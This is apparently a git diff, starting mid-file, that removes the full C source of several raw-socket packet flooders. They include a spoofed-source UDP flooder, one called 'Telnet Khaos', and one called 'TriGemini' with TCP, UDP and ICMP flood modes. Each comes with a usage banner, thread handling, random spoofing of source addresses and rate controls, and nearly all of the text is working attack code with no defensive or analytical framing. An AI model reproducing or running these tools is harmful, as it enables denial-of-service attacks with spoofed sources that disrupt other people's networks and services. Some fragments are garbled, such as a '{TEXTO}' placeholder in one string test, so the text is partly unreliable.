char *ret = malloc (strlen (str) * count + count);
|
|
||||||
if (ret == NULL) return NULL;
|
|
||||||
*ret = '\0';
|
|
||||||
char *tmp = myStrCat (ret, str);
|
|
||||||
while (--count > 0) {
|
|
||||||
tmp = myStrCat (tmp, str);
|
|
||||||
}
|
|
||||||
return ret;
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int nwords)
|
|
||||||
{
|
|
||||||
unsigned long sum;
|
|
||||||
for (sum = 0; nwords > 0; nwords--)
|
|
||||||
sum += *buf++;
|
|
||||||
sum = (sum >> 16) + (sum & 0xffff);
|
|
||||||
sum += (sum >> 16);
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + 1028;
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = IPPROTO_UDP;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
void setup_udp_header(struct udphdr *udph)
|
|
||||||
{
|
|
||||||
udph->source = htons(5678);
|
|
||||||
udph->check = 0;
|
|
||||||
char *data = (char *)udph + sizeof(struct udphdr);
|
|
||||||
data = replStr("\xFF" "\xFF" "\xFF" "\xFF", 256);
|
|
||||||
udph->len=htons(1028);
|
|
||||||
}
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
struct thread_data *td = (struct thread_data *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
|
||||||
struct sockaddr_in sin = td->sin;
|
|
||||||
char new_ip[sizeof "255.255.255.255"];
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_udp_header(udph);
|
|
||||||
udph->dest = htons (rand() % 20480);
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
int throttle = td->throttle;
|
|
||||||
uint32_t random_num;
|
|
||||||
uint32_t ul_dst;
|
|
||||||
init_rand(time(NULL));
|
|
||||||
if(throttle == 0){
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
random_num = rand_cmwc();
|
|
||||||
ul_dst = (random_num >> 24 & 0xFF) << 24 |
|
|
||||||
(random_num >> 16 & 0xFF) << 16 |
|
|
||||||
(random_num >> 8 & 0xFF) << 8 |
|
|
||||||
(random_num & 0xFF);
|
|
||||||
|
|
||||||
iph->saddr = ul_dst;
|
|
||||||
udph->source = htons(random_num & 0xFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
while(1){
|
|
||||||
throttle = td->throttle;
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
random_num = rand_cmwc();
|
|
||||||
ul_dst = (random_num >> 24 & 0xFF) << 24 |
|
|
||||||
(random_num >> 16 & 0xFF) << 16 |
|
|
||||||
(random_num >> 8 & 0xFF) << 8 |
|
|
||||||
(random_num & 0xFF);
|
|
||||||
|
|
||||||
iph->saddr = ul_dst;
|
|
||||||
udph->source = htons(random_num & 0xFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
||||||
while(--throttle);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 4){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <IP> <throttle> <threads> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
int num_threads = atoi(argv[3]);
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons (rand() % 20480);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
|
||||||
struct thread_data td[num_threads];
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
td[i].thread_id = i;
|
|
||||||
td[i].sin = sin;
|
|
||||||
td[i].throttle = atoi(argv[2]);
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
if(argc > 5)
|
|
||||||
{
|
|
||||||
sleep(atoi(argv[4]));
|
|
||||||
} else {
|
|
||||||
while(1){
|
|
||||||
sleep(1);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return 0;
|
|
||||||
}
|
|
Binary file not shown.
Binary file not shown.
@ -1,172 +0,0 @@
|
|||||||
#include <pthread.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/udp.h>
|
|
||||||
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
static unsigned int floodport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 33;
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = IPPROTO_UDP;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_udp_header(struct udphdr *udph)
|
|
||||||
{
|
|
||||||
udph->source = htons(27015);
|
|
||||||
udph->dest = htons(27015);
|
|
||||||
udph->check = 0;
|
|
||||||
void *data = (void *)udph + sizeof(struct udphdr);
|
|
||||||
memset(data, 0xFF, 4);
|
|
||||||
strcpy(data+4, "\xff\xfb\x25\xff\xfd\x26\xff\xfb\x26\xff\xfd\x03\xff\xfb\x18\xff\xfb\x1f\xff\xfb\x20\xff\xfb\x21\xff\xfb\x22\xff\xfb\x27\xff\xfd\x05");
|
|
||||||
udph->len=htons(sizeof(struct udphdr) + 33);
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(17015);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_udp_header(udph);
|
|
||||||
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 5){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Telnet Khaos\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
|
|
||||||
int num_threads = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[3]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
|
|
||||||
int multiplier = 20;
|
|
||||||
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,379 +0,0 @@
|
|||||||
/*
|
|
||||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
|
||||||
*/
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#ifdef F_PASS
|
|
||||||
#include <sys/stat.h>
|
|
||||||
#endif
|
|
||||||
#include <netinet/in_systm.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <signal.h>
|
|
||||||
#ifndef __USE_BSD
|
|
||||||
# define __USE_BSD
|
|
||||||
#endif
|
|
||||||
#ifndef __FAVOR_BSD
|
|
||||||
# define __FAVOR_BSD
|
|
||||||
#endif
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/udp.h>
|
|
||||||
#include <netinet/ip_icmp.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
#ifdef LINUX
|
|
||||||
# define FIX(x) htons(x)
|
|
||||||
#else
|
|
||||||
# define FIX(x) (x)
|
|
||||||
#endif
|
|
||||||
#define TCP_ACK 1
|
|
||||||
#define TCP_FIN 2
|
|
||||||
#define TCP_SYN 4
|
|
||||||
#define TCP_RST 8
|
|
||||||
#define UDP_CFF 16
|
|
||||||
#define ICMP_ECHO_G 32
|
|
||||||
#define TCP_NOF 64
|
|
||||||
#define TCP_URG 128
|
|
||||||
#define TCP_PSH 258
|
|
||||||
#define TCP_ECE 512
|
|
||||||
#define TCP_CWR 1024
|
|
||||||
|
|
||||||
#define TH_NOF 0x0
|
|
||||||
#define TH_ECE 0x40
|
|
||||||
#define TH_CWR 0x80
|
|
||||||
#define TCP_ATTACK() (a_flags & TCP_ACK ||\
|
|
||||||
a_flags & TCP_FIN ||\
|
|
||||||
a_flags & TCP_SYN ||\
|
|
||||||
a_flags & TCP_RST ||\
|
|
||||||
a_flags & TCP_NOF ||\
|
|
||||||
a_flags & TCP_PSH ||\
|
|
||||||
a_flags & TCP_ECE ||\
|
|
||||||
a_flags & TCP_CWR ||\
|
|
||||||
a_flags & TCP_URG )
|
|
||||||
#define UDP_ATTACK() (a_flags & UDP_CFF)
|
|
||||||
#define ICMP_ATTACK() (a_flags & ICMP_ECHO_G)
|
|
||||||
#define CHOOSE_DST_PORT() dst_sp == 0 ?\
|
|
||||||
random () :\
|
|
||||||
htons(dst_sp + (random() % (dst_ep -dst_sp +1)));
|
|
||||||
#define CHOOSE_SRC_PORT() src_sp == 0 ?\
|
|
||||||
random () :\
|
|
||||||
htons(src_sp + (random() % (src_ep -src_sp +1)));
|
|
||||||
#define SEND_PACKET() if (sendto(rawsock,\
|
|
||||||
&packet,\
|
|
||||||
(sizeof packet),\
|
|
||||||
0,\
|
|
||||||
(struct sockaddr *)&target,\
|
|
||||||
sizeof target) < 0) {\
|
|
||||||
perror("sendto");\
|
|
||||||
exit(-1);\
|
|
||||||
}
|
|
||||||
#define BANNER_CKSUM 54018
|
|
||||||
//#define BANNER_CKSUM 723
|
|
||||||
u_long lookup(const char *host);
|
|
||||||
unsigned short in_cksum(unsigned short *addr, int len);
|
|
||||||
static void inject_iphdr(struct ip *ip, u_char p, u_char len);
|
|
||||||
char *class2ip(const char *class);
|
|
||||||
static void send_tcp(u_char th_flags);
|
|
||||||
static void send_udp(u_char garbage);
|
|
||||||
static void send_icmp(u_char garbage);
|
|
||||||
char *get_plain(const char *crypt_file, const char *xor_data_key);
|
|
||||||
static void usage(const char *argv0);
|
|
||||||
u_long dstaddr;
|
|
||||||
u_short dst_sp, dst_ep, src_sp, src_ep;
|
|
||||||
char *src_class, *dst_class;
|
|
||||||
int a_flags, rawsock;
|
|
||||||
struct sockaddr_in target;
|
|
||||||
struct pseudo_hdr {
|
|
||||||
u_long saddr, daddr;
|
|
||||||
u_char mbz, ptcl;
|
|
||||||
u_short tcpl;
|
|
||||||
};
|
|
||||||
struct cksum {
|
|
||||||
struct pseudo_hdr pseudo;
|
|
||||||
struct tcphdr tcp;
|
|
||||||
};
|
|
||||||
struct {
|
|
||||||
int gv;
|
|
||||||
int kv;
|
|
||||||
void (*f)(u_char);
|
|
||||||
} a_list[] = {
|
|
||||||
{ TCP_ACK, TH_ACK, send_tcp },
|
|
||||||
{ TCP_FIN, TH_FIN, send_tcp },
|
|
||||||
{ TCP_SYN, TH_SYN, send_tcp },
|
|
||||||
{ TCP_RST, TH_RST, send_tcp },
|
|
||||||
{ TCP_NOF, TH_NOF, send_tcp },
|
|
||||||
{ TCP_URG, TH_URG, send_tcp },
|
|
||||||
{ TCP_PSH, TH_PUSH, send_tcp },
|
|
||||||
{ TCP_ECE, TH_ECE, send_tcp },
|
|
||||||
{ TCP_CWR, TH_CWR, send_tcp },
|
|
||||||
{ UDP_CFF, 0, send_udp },
|
|
||||||
{ ICMP_ECHO_G, ICMP_ECHO, send_icmp },
|
|
||||||
{ 0, 0, (void *)NULL },
|
|
||||||
};
|
|
||||||
int
|
|
||||||
main(int argc, char *argv[])
|
|
||||||
{
|
|
||||||
int n, i, on = 1;
|
|
||||||
int b_link;
|
|
||||||
#ifdef F_PASS
|
|
||||||
struct stat sb;
|
|
||||||
#endif
|
|
||||||
unsigned int until;
|
|
||||||
a_flags = dstaddr = i = 0;
|
|
||||||
dst_sp = dst_ep = src_sp = src_ep = 0;
|
|
||||||
until = b_link = -1;
|
|
||||||
src_class = dst_class = NULL;
|
|
||||||
while ( (n = getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) != -1) {
|
|
||||||
char *p;
|
|
||||||
switch (n) {
|
|
||||||
case 'T':
|
|
||||||
switch (atoi(optarg)) {
|
|
||||||
case 0: a_flags |= TCP_ACK; break;
|
|
||||||
case 1: a_flags |= TCP_FIN; break;
|
|
||||||
case 2: a_flags |= TCP_RST; break;
|
|
||||||
case 3: a_flags |= TCP_SYN; break;
|
|
||||||
case 4: a_flags |= TCP_URG; break;
|
|
||||||
case 5: a_flags |= TCP_PSH; break;
|
|
||||||
case 6: a_flags |= TCP_ECE; break;
|
|
||||||
case 7: a_flags |= TCP_CWR; break;
|
|
||||||
}
|
|
||||||
break;
|
|
||||||
case 'U':
|
|
||||||
a_flags |= UDP_CFF;
|
|
||||||
break;
|
|
||||||
case 'I':
|
|
||||||
a_flags |= ICMP_ECHO_G;
|
|
||||||
break;
|
|
||||||
case 'N':
|
|
||||||
a_flags |= TCP_NOF;
|
|
||||||
break;
|
|
||||||
case 's':
|
|
||||||
src_class = optarg;
|
|
||||||
break;
|
|
||||||
case 'h':
|
|
||||||
dstaddr = lookup(optarg);
|
|
||||||
break;
|
|
||||||
case 'd':
|
|
||||||
dst_class = optarg;
|
|
||||||
i = 1;
|
|
||||||
break;
|
|
||||||
case 'p':
|
|
||||||
if ( (p = (char *) strchr(optarg, ',')) == NULL)
|
|
||||||
usage(argv[0]);
|
|
||||||
dst_sp = atoi(optarg);
|
|
||||||
dst_ep = atoi(p +1);
|
|
||||||
break;
|
|
||||||
case 'q':
|
|
||||||
if ( (p = (char *) strchr(optarg, ',')) == NULL)
|
|
||||||
usage(argv[0]);
|
|
||||||
src_sp = atoi(optarg);
|
|
||||||
src_ep = atoi(p +1);
|
|
||||||
break;
|
|
||||||
case 'l':
|
|
||||||
b_link = atoi(optarg);
|
|
||||||
if (b_link <= 0 || b_link > 100)
|
|
||||||
usage(argv[0]);
|
|
||||||
break;
|
|
||||||
case 't':
|
|
||||||
until = time(0) +atoi(optarg);
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
usage(argv[0]);
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if ( (!dstaddr && !i) ||
|
|
||||||
(dstaddr && i) ||
|
|
||||||
(!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
|
|
||||||
(src_sp != 0 && src_sp > src_ep) ||
|
|
||||||
(dst_sp != 0 && dst_sp > dst_ep))
|
|
||||||
usage(argv[0]);
|
|
||||||
srandom(time(NULL) ^ getpid());
|
|
||||||
if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
|
|
||||||
perror("socket");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
|
|
||||||
(char *)&on, sizeof(on)) < 0) {
|
|
||||||
perror("setsockopt");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
target.sin_family = AF_INET;
|
|
||||||
for (n = 0; ; ) {
|
|
||||||
if (b_link != -1 && random() % 100 +1 > b_link) {
|
|
||||||
if (random() % 200 +1 > 199)
|
|
||||||
usleep(1);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
for (i = 0; a_list[i].f != NULL; ++i) {
|
|
||||||
if (a_list[i].gv & a_flags)
|
|
||||||
a_list[i].f(a_list[i].kv);
|
|
||||||
}
|
|
||||||
if (n++ == 100) {
|
|
||||||
if (until != -1 && time(0) >= until) break;
|
|
||||||
n = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
exit(0);
|
|
||||||
}
|
|
||||||
u_long
|
|
||||||
lookup(const char *host)
|
|
||||||
{
|
|
||||||
struct hostent *hp;
|
|
||||||
|
|
||||||
if ( (hp = gethostbyname(host)) == NULL) {
|
|
||||||
perror("gethostbyname");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
return *(u_long *)hp->h_addr;
|
|
||||||
}
|
|
||||||
#define RANDOM() (int) random() % 255 +1
|
|
||||||
char *
|
|
||||||
class2ip(const char *class)
|
|
||||||
{
|
|
||||||
static char ip[16];
|
|
||||||
int i, j;
|
|
||||||
|
|
||||||
for (i = 0, j = 0; class[i] != '{TEXTO}'; ++i)
|
|
||||||
if (class[i] == '.')
|
|
||||||
++j;
|
|
||||||
switch (j) {
|
|
||||||
case 0:
|
|
||||||
sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
|
|
||||||
break;
|
|
||||||
case 1:
|
|
||||||
sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
|
|
||||||
break;
|
|
||||||
case 2:
|
|
||||||
sprintf(ip, "%s.%d", class, RANDOM());
|
|
||||||
break;
|
|
||||||
default: strncpy(ip, class, 16);
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
return ip;
|
|
||||||
}
|
|
||||||
unsigned short
|
|
||||||
in_cksum(unsigned short *addr, int len)
|
|
||||||
{
|
|
||||||
int nleft = len;
|
|
||||||
int sum = 0;
|
|
||||||
unsigned short *w = addr;
|
|
||||||
unsigned short answer = 0;
|
|
||||||
while (nleft > 1) {
|
|
||||||
sum += *w++;
|
|
||||||
nleft -= 2;
|
|
||||||
}
|
|
||||||
if (nleft == 1) {
|
|
||||||
*(unsigned char *) (&answer) = *(unsigned char *)w;
|
|
||||||
sum += answer;
|
|
||||||
}
|
|
||||||
sum = (sum >> 16) + (sum & 0xffff);
|
|
||||||
sum += (sum >> 16);
|
|
||||||
answer = ~sum;
|
|
||||||
return answer;
|
|
||||||
}
|
|
||||||
static void
|
|
||||||
inject_iphdr(struct ip *ip, u_char p, u_char len)
|
|
||||||
{
|
|
||||||
ip->ip_hl = 5;
|
|
||||||
ip->ip_v = 4;
|
|
||||||
ip->ip_p = p;
|
|
||||||
ip->ip_tos = 0x08;
|
|
||||||
ip->ip_id = random();
|
|
||||||
ip->ip_len = len;
|
|
||||||
ip->ip_off = 0;
|
|
||||||
ip->ip_ttl = 255;
|
|
||||||
ip->ip_dst.s_addr = dst_class != NULL ?
|
|
||||||
inet_addr(class2ip(dst_class)) :
|
|
||||||
dstaddr;
|
|
||||||
ip->ip_src.s_addr = src_class != NULL ?
|
|
||||||
inet_addr(class2ip(src_class)) :
|
|
||||||
random();
|
|
||||||
target.sin_addr.s_addr = ip->ip_dst.s_addr;
|
|
||||||
}
|
|
||||||
static void
|
|
||||||
send_tcp(u_char th_flags)
|
|
||||||
{
|
|
||||||
struct cksum cksum;
|
|
||||||
struct packet {
|
|
||||||
struct ip ip;
|
|
||||||
struct tcphdr tcp;
|
|
||||||
} packet;
|
|
||||||
memset(&packet, 0, sizeof packet);
|
|
||||||
inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
|
|
||||||
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
|
|
||||||
cksum.pseudo.daddr = dstaddr;
|
|
||||||
cksum.pseudo.mbz = 0;
|
|
||||||
cksum.pseudo.ptcl = IPPROTO_TCP;
|
|
||||||
cksum.pseudo.tcpl = htons(sizeof(struct tcphdr));
|
|
||||||
cksum.pseudo.saddr = packet.ip.ip_src.s_addr;
|
|
||||||
packet.tcp.th_win = random();
|
|
||||||
packet.tcp.th_seq = random();
|
|
||||||
packet.tcp.th_ack = random();
|
|
||||||
packet.tcp.th_flags = th_flags;
|
|
||||||
packet.tcp.th_off = 5;
|
|
||||||
packet.tcp.th_urp = 0;
|
|
||||||
packet.tcp.th_sport = CHOOSE_SRC_PORT();
|
|
||||||
packet.tcp.th_dport = CHOOSE_DST_PORT();
|
|
||||||
cksum.tcp = packet.tcp;
|
|
||||||
packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));
|
|
||||||
SEND_PACKET();
|
|
||||||
}
|
|
||||||
static void
|
|
||||||
send_udp(u_char garbage)
|
|
||||||
{
|
|
||||||
struct packet {
|
|
||||||
struct ip ip;
|
|
||||||
struct udphdr udp;
|
|
||||||
} packet;
|
|
||||||
memset(&packet, 0, sizeof packet);
|
|
||||||
inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
|
|
||||||
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
|
|
||||||
packet.udp.uh_sport = CHOOSE_SRC_PORT();
|
|
||||||
packet.udp.uh_dport = CHOOSE_DST_PORT();
|
|
||||||
packet.udp.uh_ulen = htons(sizeof packet.udp);
|
|
||||||
packet.udp.uh_sum = 0;
|
|
||||||
SEND_PACKET();
|
|
||||||
}
|
|
||||||
static void
|
|
||||||
send_icmp(u_char gargabe)
|
|
||||||
{
|
|
||||||
struct packet {
|
|
||||||
struct ip ip;
|
|
||||||
struct icmp icmp;
|
|
||||||
} packet;
|
|
||||||
memset(&packet, 0, sizeof packet);
|
|
||||||
inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
|
|
||||||
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
|
|
||||||
packet.icmp.icmp_type = ICMP_ECHO;
|
|
||||||
packet.icmp.icmp_code = 0;
|
|
||||||
packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8));
|
|
||||||
SEND_PACKET();
|
|
||||||
}
|
|
||||||
const char *banner = "TriGemini. [TCP/UDP/ICMP Packet flooder]";
|
|
||||||
static void
|
|
||||||
usage(const char *argv0)
|
|
||||||
{
|
|
||||||
printf("%s \n", banner);
|
|
||||||
printf(" -U UDP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
printf(" -I ICMP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
printf(" -N Bogus attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
printf(" -T TCP attack \e[1;37m[\e[0m0:ACK 1: FIN\e[1;37m]\e[0m\n");
|
|
||||||
printf(" \e[1;37m[\e[0m2:RST 3: SYN\e[1;37m]\e[0m\n");
|
|
||||||
printf(" \e[1;37m[\e[0m4:URG 5:PUSH\e[1;37m]\e[0m\n");
|
|
||||||
printf(" \e[1;37m[\e[0m6:ECE 7: CWR\e[1;37m]\e[0m\n");
|
|
||||||
printf(" -h target host/ip \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
printf(" -d destination class \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
printf(" -s source class/ip \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
printf(" -p destination port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
printf(" -q source port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
printf(" -l pps limiter \e[1;37m(\e[0m\e[0;31mno limit\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
